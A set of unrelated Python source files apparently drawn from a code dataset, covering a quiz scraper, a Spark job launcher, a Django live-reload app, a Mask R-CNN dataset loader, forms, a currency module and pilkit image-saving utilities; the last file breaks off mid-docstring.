# single JSON file keyed by 0-based question index.
files = ['test_2.html', 'test_3.html', 'test_4.html', 'test_5.html']
questions = []
# 1-based global question number -> list of (answer text, is_correct) tuples.
answers = defaultdict(list)
question_index = 0
for _file in files:
    # Offset so each file's per-file 1-based answer ids continue the
    # numbering established by previous files.
    question_index = len(questions)
    with open(_file, 'r') as f:
        content = f.read()
    soup = BeautifulSoup(content)
    for item in soup.find_all('p', style="font-weight:bold;"):
        questions.append(item.get_text())
    for item in soup.find_all('div', class_="blockindent4"):
        question_id = item.input.attrs['name'].split('q')[1]
        # The inline onclick handler contains "incorrect" for wrong answers.
        is_correct_answer = 'incorrect' not in item.input.attrs['onclick']
        answers[question_index + int(question_id)].append((item.get_text(), is_correct_answer))
data = {}
for index, question in enumerate(questions):
    data[index] = {"question": question, "answers": answers[index + 1]}
json_data = json.dumps(data, sort_keys=True, indent=2)
# Fix: the original opened this file and never closed it, risking an
# unflushed/truncated output; a context manager guarantees the close.
with open('../class-c-questions.json', 'w+') as json_file:
    json_file.write(json_data)
| StarcoderdataPython |
6638279 | <reponame>phplaboratory/madcore-ai
from __future__ import print_function
import os
import sys
from utils import run_cmd
# Kubernetes namespace that hosts the Spark cluster and the Zeppelin pod.
NAMESPACE = 'spark-cluster'
# Spark installation prefix inside the pod.
SPARK_PATH = '/opt/spark'
# TODO@geo validate this
# NOTE(review): sys.argv is read unchecked; running with fewer than 4
# arguments raises IndexError — consider argparse with usage output.
sparks_args = sys.argv[1]
# this can be
app_file_name = sys.argv[2]
app_args = sys.argv[3]
example_subfold = None
# Python examples live under examples/src/main/python; anything else is
# assumed to be a jar under lib/.
if app_file_name.endswith('.py'):
    example_file_path = os.path.join(SPARK_PATH, 'examples/src/main/python', app_file_name)
else:
    # Load jar files with examples
    example_file_path = os.path.join(SPARK_PATH, 'lib', app_file_name)
# NOTE(review): this kubectl lookup runs at import time, not only under
# __main__ — importing this module has side effects.
zepplin_controller = run_cmd(
    "kubectl get pods --namespace=%s | grep zeppelin-controller | awk '{print $1}'" % (NAMESPACE,))
# spark-submit is executed inside the Zeppelin controller pod against the
# in-cluster master.
run_spark_job_cmd = "kubectl exec -i {pod_name} --namespace={namespace} -ti -- " \
                    "spark-submit --master=spark://spark-master:7077 {sparks_args} {spark_file} {app_args}"
run_spark_job = run_spark_job_cmd.format(pod_name=zepplin_controller, namespace=NAMESPACE, sparks_args=sparks_args,
                                         spark_file=example_file_path, app_args=app_args)
if __name__ == '__main__':
    print(run_cmd(run_spark_job))
| StarcoderdataPython |
1796812 | <reponame>kezabelle/django-livereloadish<filename>livereloadish/apps.py
import logging
import os
import pickle
import time
import pathlib
from collections import namedtuple
from datetime import datetime, timezone
from hashlib import sha1
from tempfile import gettempdir
from typing import Dict, Literal, Optional
from asgiref.local import Local
from django.apps import AppConfig, apps
from django.conf import settings
from django.core.checks import register, Warning
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage
from django.dispatch import receiver
from django.utils.autoreload import (
DJANGO_AUTORELOAD_ENV,
autoreload_started,
BaseReloader,
)
from django.utils.functional import cached_property
from livereloadish.patches import (
do_patch_static_serve,
do_patch_engine_find_template,
do_patch_staticnode_url,
do_patch_filesystemstorage_url,
do_patch_extendsnode_get_parent,
do_patch_template_compile_nodelist,
)
__all__ = ["logger", "Seen", "LiveReloadishConfig"]
logger = logging.getLogger(__name__)
def check_for_default_middleware(app_configs, **kwargs):
    """Django system check: warn when the Livereloadish middleware is missing."""
    try:
        from django.conf import settings
        middleware = settings.MIDDLEWARE
    except Exception:
        # Settings may be unconfigured at check time; nothing to report.
        return []
    if "livereloadish.middleware.LivereloadishMiddleware" in middleware:
        return []
    return [
        Warning(
            msg="Unable to find default Livereloadish middleware, unless "
            "you've subclassed and replaced it, live-reloading won't work",
            hint="Add 'livereloadish.middleware.LivereloadishMiddleware' to your settings.MIDDLEWARE",
            obj=None,
            id="livereloadish.W001",
        )
    ]
class Seen(
    namedtuple(
        "Seen",
        ("relative_path", "absolute_path", "filename", "mtime", "requires_full_reload"),
    )
):
    """One watched file: paths, basename, mtime, and its reload strategy."""

    def mtime_as_utc_date(self):
        """Modification time as a timezone-aware UTC datetime."""
        return datetime.fromtimestamp(self.mtime, timezone.utc)

    def _asdict(self):
        """Dict form of the record, adding an ISO-8601 rendering of the mtime."""
        return dict(
            relative_path=self.relative_path,
            absolute_path=self.absolute_path,
            filename=self.filename,
            mtime=self.mtime,
            mtime_iso=self.mtime_as_utc_date().isoformat(),
            requires_full_reload=self.requires_full_reload,
        )
class LiveReloadishConfig(AppConfig):
    """
    AppConfig for live-reload support: monkeypatches Django's template and
    static-file machinery so served files are recorded into ``seen``, and
    persists that cache across autoreload restarts via a pickled lockfile in
    the system temp directory.  Only active when DEBUG is on and the process
    is the autoreload child (see _should_be_enabled).
    """
    default_auto_field = "django.db.models.BigAutoField"
    name = "livereloadish"
    label = "livereloadish"
    # Assuming multiple projects, and each one is a separate venv, is probably enough...
    lockfile: str = sha1(os.path.dirname(__file__).encode("utf-8")).hexdigest()
    # How long before a file (either the lockfile or the individual entries therein)
    # is considered stale, in seconds.
    stale_after: int = 60 * 15
    # Sleep durations for the SSE connection
    sleep_quick = 0.35
    sleep_slow = 1.0
    # This is intentionally mutable, fwiw.
    # It's also in a precise order, being that dicts are insertion ordered nowawdays.
    # CSS is most likely to change, then templates (which /may/ be a partial reload)
    # then finally JS which is most likely a full page reload (cos I ain't implemented
    # any form of module.hot style accept/reject) to throw away state and keep things
    # lovely and stateless.
    # And then a bunch of stuff where there may not be a specific reliable
    # strategy (eg: images. Easy enough to replace <img> but then what about <picture>
    # and srcset and CSS backgrounds etc)
    seen: Dict[str, Dict[str, Seen]] = {
        "text/css": {},
        "text/html": {},
        "application/xhtml+xml": {},
        "text/javascript": {},
        "application/javascript": {},
        "image/png": {},
        "image/jpeg": {},
        "image/svg+xml": {},
        "image/webp": {},
        "image/gif": {},
        "font/ttf": {},
        "font/woff": {},
        "font/woff2": {},
        "text/x-python": {},
        "application/x-python-code": {},
        "text/markdown": {},
        # "application/json": {},
    }
    # Per-request scratch space (asgiref Local: isolated per thread/task).
    during_request = Local()
    # Set by the autoreload_started receiver below the class (if it fires).
    django_reloader: Optional[BaseReloader] = None

    def ready(self) -> bool:
        """Register the system check, then apply all patches and load the cache."""
        register("middleware")(check_for_default_middleware)
        if not self._should_be_enabled():
            logger.debug("Livereloadish is not applying patches")
            return False
        logger.info("Livereloadish applying patches for the process")
        # all() short-circuits on the first patch/load step reporting failure.
        return all(
            (
                do_patch_static_serve(),
                do_patch_template_compile_nodelist(),
                do_patch_engine_find_template(),
                do_patch_filesystemstorage_url(),
                do_patch_staticnode_url(),
                do_patch_extendsnode_get_parent(),
                self.load_from_lockfile(),
            )
        )

    def add_to_seen(
        self,
        content_type: str,
        relative_path: str,
        absolute_path: str,
        mtime: float,
        requires_full_reload: bool,
    ) -> Literal[True]:
        """Record (or refresh) one watched file under its content type."""
        self.seen[content_type][absolute_path] = Seen(
            relative_path,
            absolute_path,
            os.path.basename(relative_path),
            mtime,
            requires_full_reload,
        )
        # Disabled for now ...
        if 0 and self.django_reloader is not None:
            # Apparently the modern reloader literally doesn't support str paths,
            # only Path instances. boo.
            #
            # mtime = file.stat().st_mtime
            # AttributeError: 'str' object has no attribute 'stat'
            #
            # Note that I can't see a way to determine if the file being changed
            # is already present in either directory_globs or iter_all_python_module_files
            # so I think doing it this way introduces the possibility that it's
            # stat'd twice or thrice? Although it may get amortized down into one
            # value based on snapshot_files()'s seen_files or tick's mtimes?
            self.django_reloader.extra_files.add(pathlib.Path(absolute_path))
        return True

    @cached_property
    def lockfile_storage(self) -> FileSystemStorage:
        """Storage rooted at <tmp>/livereloadish used for the pickled cache."""
        return FileSystemStorage(
            location=os.path.join(gettempdir(), "livereloadish"),
            base_url=None,
        )

    def _should_be_enabled(self) -> bool:
        """Active only under DEBUG and inside the autoreload child process."""
        return (
            settings.DEBUG is True
            and os.environ.get(DJANGO_AUTORELOAD_ENV, "false") == "true"
        )

    def load_from_lockfile(self) -> bool:
        """Restore ``seen`` from the pickled lockfile, if present and fresh."""
        if not self._should_be_enabled():
            logger.debug("Livereloadish skipping loading previously seen file cache")
            return False
        if not self.lockfile_storage.exists(self.lockfile):
            logger.debug("Livereloadish has no previously seen file cache")
            return False
        lockfile_path = self.lockfile_storage.path(self.lockfile)
        last_modified = os.path.getmtime(lockfile_path)
        # If it's there but older than we'd like, assume a refresh is needed
        # to collect files to watch.
        if last_modified < (time.time() - self.stale_after):
            logger.info(
                "Livereloadish has a stale cache of seen files: %s", lockfile_path
            )
            return False
        with self.lockfile_storage.open(self.lockfile) as f:
            try:
                self.seen = pickle.loads(f.read())
            except EOFError:
                logger.warning(
                    "Livereloadish previously seen files cache is corrupt: %s",
                    lockfile_path,
                )
            except TypeError:
                logger.warning(
                    "Livereloadish previously seen files cache contains out of date datastructures: %s",
                    lockfile_path,
                )
            else:
                file_count = sum(len(values) for values in self.seen.values())
                logger.debug(
                    "Livereloadish %s previously seen files are being tracked from cache (< 15 minutes old): %s",
                    file_count,
                    lockfile_path,
                )
        return True

    def dump_to_lockfile(self) -> bool:
        """Pickle ``seen`` to the lockfile; best-effort (False on any failure)."""
        if not self._should_be_enabled():
            logger.debug("Livereloadish skipping dumping previously seen file cache")
            return False
        file_count = sum(len(values) for values in self.seen.values())
        logger.debug(
            "Livereloadish dumping %s previously seen files to cache: %s",
            file_count,
            self.lockfile_storage.path(self.lockfile),
        )
        try:
            self.lockfile_storage.delete(self.lockfile)
            self.lockfile_storage.save(
                self.lockfile, ContentFile(pickle.dumps(self.seen))
            )
        except FileNotFoundError as e:
            logger.debug(
                "Failed to dump %s files into previously seen file cache, lockfile was swept away probably",
                file_count,
                exc_info=e,
            )
            # Delete the cached_property to try again at getting the temp dir.
            # Because it could've technically changed...
            if "lockfile_storage" in self.__dict__:
                self.__dict__.pop("lockfile_storage")
            return False
        except OSError as e:
            logger.debug(
                "Failed to dump %s files into previously seen file cache for an unknown reason",
                file_count,
                exc_info=e,
            )
            # Delete the cached_property to try again at getting the temp dir.
            # Because it could've technically changed...
            if "lockfile_storage" in self.__dict__:
                self.__dict__.pop("lockfile_storage")
            return False
        return True
@receiver(autoreload_started, dispatch_uid="livereloadish_reloader-connected")
def save_reloader_to_appconfig(sender, signal, **kwargs):
    """
    Stash the running autoreloader instance onto our AppConfig.

    The autoreload module exposes no public handle on the reloader in use,
    so we capture it from the autoreload_started signal's sender instead.
    """
    try:
        config = apps.get_app_config("livereloadish")
    except LookupError:
        # App not installed/ready yet; nothing to attach to.
        return None
    config.django_reloader = sender
3492764 | from os import listdir, path
from xml.etree import ElementTree
import numpy as np
from mrcnn.utils import Dataset
class ISRLHumanDatasetManager(Dataset):
    """
    mrcnn Dataset for the ISRL human dataset: color images with Pascal-VOC
    style XML bounding-box annotations, exposed as rectangular (box-filled)
    instance masks for the single class "human".
    """

    def load_dataset(self, dataset_dir, dataset_type="train"):
        """
        Register the images for one split ("train"/"val"/anything-else=test).

        The split is 70/20/10 and reproducible: indices are shuffled with a
        fixed numpy seed (1) before slicing.
        """
        self.add_class("dataset", 1, "human")
        images_dir = dataset_dir + '/color/'
        annotations_dir = dataset_dir + '/annotations_voc_xml/'
        image_id_list = []
        image_path_list = []
        annotation_path_list = []
        for filename in listdir(images_dir):
            # Image id is the filename without its 4-char extension (e.g. ".png").
            image_id = filename[:-4]
            image_path = images_dir + filename
            annotation_path = annotations_dir + image_id + '.xml'
            # bad depth images in the beginning
            if int(image_id) < 16:
                continue
            # Boxes are not in all images
            if not path.exists(annotation_path):
                continue
            image_id_list.append(image_id)
            image_path_list.append(image_path)
            annotation_path_list.append(annotation_path)
        indices = np.arange(len(image_id_list))
        threshold1 = round(len(image_id_list) * 0.7)
        threshold2 = round(len(image_id_list) * 0.9)
        np.random.seed(1)
        np.random.shuffle(indices)
        if dataset_type == "train":
            indices = indices[:threshold1]
        elif dataset_type == "val":
            indices = indices[threshold1:threshold2]
        else:
            indices = indices[threshold2:]
        print("Indices:", indices)
        for i in indices:
            self.add_image('dataset', image_id=image_id_list[i], path=image_path_list[i], annotation=annotation_path_list[i])

    def get_boxes(self, path):
        """
        Parse one VOC XML file; return ([xmin, ymin, xmax, ymax] boxes,
        image width, image height).

        NOTE(review): the parameter name `path` shadows the `os.path` module
        imported at the top of this file — consider renaming at the next
        interface-breaking change.
        """
        root = ElementTree.parse(path).getroot()
        image_boxes = list()
        for box in root.findall('.//bndbox'):
            xmin = int(box.find('xmin').text)
            ymin = int(box.find('ymin').text)
            xmax = int(box.find('xmax').text)
            ymax = int(box.find('ymax').text)
            image_boxes.append([xmin, ymin, xmax, ymax])
        image_width = int(root.find('.//size/width').text)
        image_height = int(root.find('.//size/height').text)
        return image_boxes, image_width, image_height

    def load_mask(self, image_id):
        """
        Build per-instance masks for one registered image.

        Returns (masks, class_ids) where masks is HxWxN uint8 with each
        bounding box filled with 1s (rectangles, not true segmentation).
        """
        info = self.image_info[image_id]
        path = info['annotation']
        image_boxes, image_width, image_height = self.get_boxes(path)
        boxes_number = len(image_boxes)
        masks = np.zeros([image_height, image_width, boxes_number], dtype='uint8')
        class_ids = []
        for i in range(boxes_number):
            box = image_boxes[i]
            start_row, end_row = box[1], box[3]
            start_column, end_column = box[0], box[2]
            masks[start_row:end_row, start_column:end_column, i] = 1
            class_ids.append(self.class_names.index('human'))
        return masks, np.asarray(class_ids, dtype='int32')

    def image_reference(self, image_id):
        """Return the source path for a registered image (mrcnn hook)."""
        info = self.image_info[image_id]
        return info['path']
| StarcoderdataPython |
5065646 | <gh_stars>1-10
# Asset Performance Management (APM) fleet-performance driver script.
# NOTE(review): pandas, time, sqrt, plt, Plot_All_Days_Hour_Data and
# Plot_Stack are imported but never used in this script -- confirm before
# removing.
import pandas as pd
from time import time
from math import sqrt
import matplotlib.pyplot as plt
import datetime
import sys
# Make the APM package modules importable when running from the repo root.
sys.path.insert(0,'APM/BIN/')
# Import real time contingencies assessment
from ST_AM_Contingencies_Analysis import Real_Time_Contingencies as RTC_A
from ST_AM_Contingencies_Ploty import Plot_All_Days_Hour_Data
from ST_AM_Contingencies_Ploty import Plot_Stack
# Performance assessment Settings
# Input spreadsheets describing the IEEE 39-bus test system and its assets.
file_tags = 'APM/DATA/IEEE39_Asset_Data.xlsx'
asset_portfolio_source = 'APM/DATA/IEEE39_Asset_Data.xlsx'
net_file = 'APM/DATA/IEEE39NODES.xlsx'
# Start of the simulated planning horizon.
date_beg = datetime.datetime(2020, 1, 1,1)
load_growth = 0.02 # Assumed load growth per year
h_end = 5*24*365 # Assumed period of planning (in hours: 5 years)
# NOTE(review): date_beg, h_end and asset_portfolio_source are not consumed
# below -- presumably used by a fuller version of this script; verify.
case_settings = {
    'portfolio_source': 'CASES/01_ENERCA/ENERCA_Asset_Portfolio.xlsx',
    'database_sett': 'CASES/01_ENERCA/ENERCA_DB_Model.json'
}
# Project data
report_data = {
    "Name" : 'Asset Management',
    "Sub_title" : 'APM - Fleet Performance'
}
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#                                                               #
#                 Normal Operating conditions                   #
#                                                               #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Create contingencies assessment object
Cont_A = RTC_A(net_file,file_tags)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#                                                               #
#              Historical records of condition                  #
#                                                               #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Portfolio assessment
from APM_Module import APM
#Assets = APM(asset_portfolio_source,load_growth)
Assets = APM(case_settings,load_growth)
# Generate report
from R1_Reports import Test_Report_AP
Test_Report_AP(report_data,Assets)
6533831 | from django import forms
from .models import Lost
from .models import Found
from django.forms import ModelForm
class LostForm(ModelForm):
    """Form for reporting a lost item.

    Exposes the name, photo, description and last-seen fields of the
    ``Lost`` model.
    """
    class Meta:
        model = Lost
        fields = ['Item_Name','Item_Image','Description','Last_Seen']
class FoundForm(ModelForm):
    """Form for reporting a found item.

    Exposes the name, photo, description and found-on fields of the
    ``Found`` model.
    """
    class Meta:
        model = Found
        # Spacing normalized (fields = ...) to match LostForm above.
        fields = ['Item_Name','Item_Image','Description','Found_on']
1777125 | <reponame>rockwolf/python
#!/usr/local/bin/python
"""
See LICENSE file for copyright and license details.
"""
from database.databaseaccess import DatabaseAccess
from database.mappings import *
from modules.core_module import CoreModule
from modules.statement import Statement
from modules.function import *
from modules.constant import *
from generic.modules.function import *
class CurrencyExchange(CoreModule):
    """
    Builds insert statements for the currency_exchange table.

    NOTE(review): this module uses Python 2 ``print`` statements, so it is
    Python 2 only.
    """
    def __init__(self, config):
        """
        Store the configuration used to open database connections later.
        """
        self.config = config
    def create_statements(self, input_fields):
        """
        Creates the records needed for Table.CURRENCY_EXCHANGE.

        input_fields: iterable of field sequences indexed by the Input.*
        constants (CURRENCY_FROM, CURRENCY_TO, EXCHANGE_RATE).
        Returns the populated Statement on success, or None if an exception
        occurred (the error is printed, not re-raised) -- callers must
        handle the None case.
        """
        try:
            dba = DatabaseAccess(self.config)
            statement_currency_exchange = Statement(T_CURRENCY_EXCHANGE)
            date_created = current_date()
            date_modified = current_date()
            # records is the 1-based line number within the statement.
            records = 0
            for fields in input_fields:
                records = records + 1
                #NOTE: we don't need to query, because we always add a new
                #currency_exchange line. The same value can be used multiple
                #times, so it's not possible to query if one already exists.
                statement_currency_exchange.add(
                    records,
                    {
                        'currency_exchange_id': None,
                        'currency_from_id': dba.currency_id_from_currency(
                            fields[Input.CURRENCY_FROM]),
                        'currency_to_id': dba.currency_id_from_currency(
                            fields[Input.CURRENCY_TO]),
                        'exchange_rate': Decimal(fields[Input.EXCHANGE_RATE]),
                        'date_created': date_created,
                        'date_modified': date_modified
                    }
                )
            return statement_currency_exchange
        except Exception as ex:
            # NOTE(review): swallowing every exception here makes the method
            # silently return None -- confirm this is intentional.
            print Error.CREATE_STATEMENTS_TABLE_CURRENCY_EXCHANGE, ex
        finally:
            # NOTE(review): rebinding dba to None does not close the database
            # connection; confirm DatabaseAccess releases resources on GC.
            dba = None
| StarcoderdataPython |
1614012 | <reponame>fish2000/pilkit<filename>pilkit/utils.py<gh_stars>1-10
import os
import mimetypes
import sys
from io import UnsupportedOperation
from .exceptions import UnknownExtension, UnknownFormat
from .lib import Image, ImageFile, StringIO, string_types
# Formats that support full, per-pixel alpha transparency (RGBA mode).
RGBA_TRANSPARENCY_FORMATS = ['PNG']
# Formats that support palette-based (single transparent index) transparency.
PALETTE_TRANSPARENCY_FORMATS = ['PNG', 'GIF']
# Preferred file extension per format; consulted before PIL's own mapping.
DEFAULT_EXTENSIONS = {
    'JPEG': '.jpg',
    'PNG': '.png',
}
def img_to_fobj(img, format, autoconvert=True, **options):
    """Save *img* into a fresh in-memory file object in *format* and return it.

    Extra keyword *options* are forwarded to the image saver (e.g. quality).
    """
    return save_image(img, StringIO(), format, options, autoconvert)
def open_image(target):
    """Rewind the file-like *target* to its start and open it as a PIL image."""
    target.seek(0)
    return Image.open(target)
_pil_init = 0
def _preinit_pil():
    """Ensure PIL's standard file-format drivers are loaded.

    Returns True when ``Image.preinit()`` was actually invoked (so new
    drivers may now be available) and False when the standard drivers had
    already been loaded earlier.
    """
    global _pil_init
    if _pil_init >= 1:
        return False
    Image.preinit()
    _pil_init = 1
    return True
def _init_pil():
    """Ensure every PIL file-format driver is loaded.

    Returns True when ``Image.init()`` was actually invoked (so new drivers
    may now be available) and False when a full init had already happened.
    """
    global _pil_init
    _preinit_pil()
    if _pil_init >= 2:
        return False
    Image.init()
    _pil_init = 2
    return True
def _extension_to_format(extension):
    # Case-insensitive lookup in PIL's extension->format table; None if unknown.
    return Image.EXTENSION.get(extension.lower())
def _format_to_extension(format):
    """Return a file extension for *format*, or None if none is registered.

    The ``DEFAULT_EXTENSIONS`` override is honoured first, but only when PIL
    itself also recognises that extension; otherwise the first matching
    entry in PIL's extension table wins.
    """
    if not format:
        return None
    format = format.upper()
    preferred = DEFAULT_EXTENSIONS.get(format)
    # It's not enough for an extension to be listed in DEFAULT_EXTENSIONS;
    # it must also be recognized by PIL.
    if preferred is not None and preferred in Image.EXTENSION:
        return preferred
    for ext, fmt in Image.EXTENSION.items():
        if fmt == format:
            return ext
    return None
def extension_to_mimetype(ext):
    """Return the MIME type for a file extension (e.g. ``'.png'``), or None
    when the extension is unknown or *ext* is falsy.
    """
    # guess_type requires a full filename, not just an extension.
    filename = 'a%s' % (ext or '')
    # guess_type always returns a (type, encoding) pair, so indexing [0] is
    # safe; the previous ``except IndexError`` branch was unreachable dead
    # code and has been removed.
    return mimetypes.guess_type(filename)[0]
def format_to_mimetype(format):
    """Return the MIME type for a PIL format name (e.g. ``'JPEG'``)."""
    return extension_to_mimetype(format_to_extension(format))
def extension_to_format(extension):
    """Return the PIL format registered for *extension*.

    PIL's driver tables are populated lazily, so the lookup is retried after
    each initialization stage. Raises ``UnknownExtension`` when no driver
    claims the extension even after a full init.
    """
    format = _extension_to_format(extension)
    if format:
        return format
    # Progressively load more drivers and retry; each loader returns True
    # only when it may have registered new formats.
    for load_drivers in (_preinit_pil, _init_pil):
        if load_drivers():
            format = _extension_to_format(extension)
            if format:
                return format
    raise UnknownExtension(extension)
def format_to_extension(format):
    """Return the first file extension registered for *format*.

    PIL's driver tables are populated lazily, so the lookup is retried after
    each initialization stage. Raises ``UnknownFormat`` when no extension is
    found even after a full init (or when *format* is falsy).
    """
    if format:
        extension = _format_to_extension(format)
        if extension:
            return extension
        # Progressively load more drivers and retry; each loader returns
        # True only when it may have registered new extensions.
        for load_drivers in (_preinit_pil, _init_pil):
            if load_drivers():
                extension = _format_to_extension(format)
                if extension:
                    return extension
    raise UnknownFormat(format)
def suggest_extension(name, format):
    """Pick a file extension for *name* when it is saved as *format*.

    Keeps the original extension whenever it is equivalent to the one
    *format* suggests (same string, or mapping back to the same format);
    otherwise returns the extension suggested by *format*. If *format* is
    unknown to PIL, the original extension is kept unchanged.
    """
    original_extension = os.path.splitext(name)[1]
    try:
        suggested_extension = format_to_extension(format)
    except UnknownFormat:
        # Unknown target format: nothing better to offer than the original.
        extension = original_extension
    else:
        if suggested_extension.lower() == original_extension.lower():
            extension = original_extension
        else:
            try:
                original_format = extension_to_format(original_extension)
            except UnknownExtension:
                # Original extension means nothing to PIL; use the suggestion.
                extension = suggested_extension
            else:
                # If the formats match, give precedence to the original extension.
                if format.lower() == original_format.lower():
                    extension = original_extension
                else:
                    extension = suggested_extension
    return extension
class FileWrapper(object):
    """Transparent proxy around a file-like object.

    Attribute access, assignment and deletion are all forwarded to the
    wrapped object. The exception is ``fileno()``: when the wrapped object
    raises ``io.UnsupportedOperation``, the wrapper raises
    ``AttributeError`` instead, which is the error some PIL versions expect
    when probing for a real file descriptor.
    """

    def __init__(self, wrapped):
        # Bypass our own __setattr__ so this lands on the wrapper itself.
        super(FileWrapper, self).__setattr__('_wrapped', wrapped)

    def fileno(self):
        wrapped = self._wrapped
        try:
            return wrapped.fileno()
        except UnsupportedOperation:
            raise AttributeError

    def __getattr__(self, attr):
        return getattr(self._wrapped, attr)

    def __setattr__(self, attr, value):
        setattr(self._wrapped, attr, value)

    def __delattr__(self, attr):
        delattr(self._wrapped, attr)
def save_image(img, outfile, format, options=None, autoconvert=True):
    """
    Wraps PIL's ``Image.save()`` method. There are two main benefits of using
    this function over PIL's:

    1. It gracefully handles the infamous "Suspension not allowed here" errors.
    2. It prepares the image for saving using ``prepare_image()``, which will do
       some common-sense processing given the target format.

    :param img: The PIL image to save.
    :param outfile: A file-like object (or, for some PIL versions, a path).
    :param format: Target format name (e.g. ``'JPEG'``).
    :param options: Extra keyword arguments for ``Image.save()``.
    :param autoconvert: When True, run ``prepare_image()`` first.
    :returns: *outfile*, rewound to position 0 when it supports seeking.
    """
    options = options or {}
    if autoconvert:
        img, save_kwargs = prepare_image(img, format)
        # Use returned from prepare_image arguments for base
        # and update them with provided options. Then use the result
        save_kwargs.update(options)
        options = save_kwargs
    # Attempt to reset the file pointer.
    try:
        outfile.seek(0)
    except AttributeError:
        # Not seekable (e.g. a plain path string) -- nothing to reset.
        pass

    def save(fp):
        # quiet() silences stderr chatter from PIL's C libraries.
        with quiet():
            img.save(fp, format, **options)

    # Some versions of PIL only catch AttributeErrors where they should also
    # catch UnsupportedOperation exceptions. To work around this, we wrap the
    # file with an object that will raise the type of error it wants.
    if any(isinstance(outfile, t) for t in string_types):
        # ...but don't wrap strings.
        wrapper = outfile
    else:
        wrapper = FileWrapper(outfile)

    try:
        save(wrapper)
    except IOError:
        # PIL can have problems saving large JPEGs if MAXBLOCK isn't big enough,
        # So if we have a problem saving, we temporarily increase it. See
        # http://github.com/matthewwithanm/django-imagekit/issues/50
        # https://github.com/matthewwithanm/django-imagekit/issues/134
        # https://github.com/python-imaging/Pillow/issues/148
        # https://github.com/matthewwithanm/pilkit/commit/0f914e8b40e3d30f28e04ffb759b262aa8a1a082#commitcomment-3885362

        # MAXBLOCK must be at least as big as...
        new_maxblock = max(
            (len(options['exif']) if 'exif' in options else 0) + 5,  # ...the entire exif header block
            img.size[0] * 4,  # ...a complete scan line
            3 * img.size[0] * img.size[1],  # ...3 bytes per every pixel in the image
        )
        if new_maxblock < ImageFile.MAXBLOCK:
            # A bigger MAXBLOCK can't have been the problem; re-raise.
            raise
        old_maxblock = ImageFile.MAXBLOCK
        ImageFile.MAXBLOCK = new_maxblock
        try:
            save(wrapper)
        finally:
            # Always restore the module-global MAXBLOCK.
            ImageFile.MAXBLOCK = old_maxblock

    try:
        outfile.seek(0)
    except AttributeError:
        pass
    return outfile
class quiet(object):
    """
    A context manager for suppressing the stderr activity of PIL's C libraries.
    Based on http://stackoverflow.com/a/978264/155370

    On enter, file descriptor 2 (stderr) is redirected to ``os.devnull``;
    on exit the original descriptor is restored. If no real stderr file
    descriptor is available (or /dev/null can't be opened) the manager is
    a no-op.
    """
    def __enter__(self):
        try:
            self.stderr_fd = sys.__stderr__.fileno()
        except AttributeError:
            # In case of Azure, the file descriptor is not present so we can return
            # from here
            return
        except UnsupportedOperation:
            # In case of Windows 2016, the file descriptor is not present so we can return
            # from here
            return
        try:
            self.null_fd = os.open(os.devnull, os.O_RDWR)
        except OSError:
            # If dev/null isn't writeable, then they just have to put up with
            # the noise.
            return
        # Duplicate the real stderr fd so it can be restored in __exit__,
        # then point the stderr fd at /dev/null.
        self.old = os.dup(self.stderr_fd)
        os.dup2(self.null_fd, self.stderr_fd)

    def __exit__(self, *args, **kwargs):
        # If __enter__ bailed early, these attributes were never set and
        # there is nothing to undo.
        # NOTE(review): the truthiness check would also skip restoration if a
        # dup'd descriptor happened to be 0 -- confirm this edge is acceptable.
        if not getattr(self, 'null_fd', None):
            return
        if not getattr(self, 'old', None):
            return
        os.dup2(self.old, self.stderr_fd)
        os.close(self.null_fd)
        os.close(self.old)
def prepare_image(img, format):
    """
    Prepares the image for saving to the provided format by doing some
    common-sense conversions. This includes things like preserving transparency
    and quantizing. This function is used automatically by ``save_image()``
    immediately before saving unless you specify ``autoconvert=False``. It is
    provided as a utility for those doing their own processing.

    :param img: The image to prepare for saving.
    :param format: The format that the image will be saved to.
    :returns: A ``(converted_image, save_kwargs)`` pair; *save_kwargs* are
        extra keyword arguments to pass to ``Image.save()``.
    """
    make_opaque = False
    save_kwargs = {}
    format = format.upper()

    if img.mode == 'RGBA':
        if format in RGBA_TRANSPARENCY_FORMATS:
            # Target supports full alpha; nothing to convert.
            pass
        elif format in PALETTE_TRANSPARENCY_FORMATS:
            # If you're going from a format with alpha transparency to one
            # with palette transparency, transparency values will be
            # snapped: pixels that are more opaque than not will become
            # fully opaque; pixels that are more transparent than not will
            # become fully transparent. This will not produce a good-looking
            # result if your image contains varying levels of opacity; in
            # that case, you'll probably want to use a processor to composite
            # the image on a solid color. The reason we don't do this by
            # default is because not doing so allows processors to treat
            # RGBA-format images as a super-type of P-format images: if you
            # have an RGBA-format image with only a single transparent
            # color, and save it as a GIF, it will retain its transparency.
            # In other words, a P-format image converted to an
            # RGBA-formatted image by a processor and then saved as a
            # P-format image will give the expected results.

            # Work around a bug in PIL: split() doesn't check to see if
            # img is loaded.
            img.load()
            alpha = img.split()[-1]
            # Alpha <= 128 becomes fully transparent (palette index 255).
            mask = Image.eval(alpha, lambda a: 255 if a <= 128 else 0)
            img = img.convert('RGB').convert('P', palette=Image.ADAPTIVE,
                                             colors=255)
            img.paste(255, mask)
            save_kwargs['transparency'] = 255
        else:
            # Simply converting an RGBA-format image to an RGB one creates a
            # gross result, so we paste the image onto a white background. If
            # that's not what you want, that's fine: use a processor to deal
            # with the transparency however you want. This is simply a
            # sensible default that will always produce something that looks
            # good. Or at least, it will look better than just a straight
            # conversion.
            make_opaque = True
    elif img.mode == 'P':
        if format in PALETTE_TRANSPARENCY_FORMATS:
            # Carry the existing transparent palette index through, if any.
            try:
                save_kwargs['transparency'] = img.info['transparency']
            except KeyError:
                pass
        elif format in RGBA_TRANSPARENCY_FORMATS:
            # Currently PIL doesn't support any RGBA-mode formats that
            # aren't also P-mode formats, so this will never happen.
            img = img.convert('RGBA')
        else:
            make_opaque = True
    else:
        img = img.convert('RGB')

        # GIFs are always going to be in palette mode, so we can do a little
        # optimization. Note that the RGBA sources also use adaptive
        # quantization (above). Images that are already in P mode don't need
        # any quantization because their colors are already limited.
        if format == 'GIF':
            img = img.convert('P', palette=Image.ADAPTIVE)

    if make_opaque:
        from .processors import MakeOpaque
        img = MakeOpaque().process(img).convert('RGB')

    if format == 'JPEG':
        save_kwargs['optimize'] = True

    return img, save_kwargs
def process_image(img, processors=None, format=None, autoconvert=True, options=None):
    """Run *img* through *processors* and return the result as a file object.

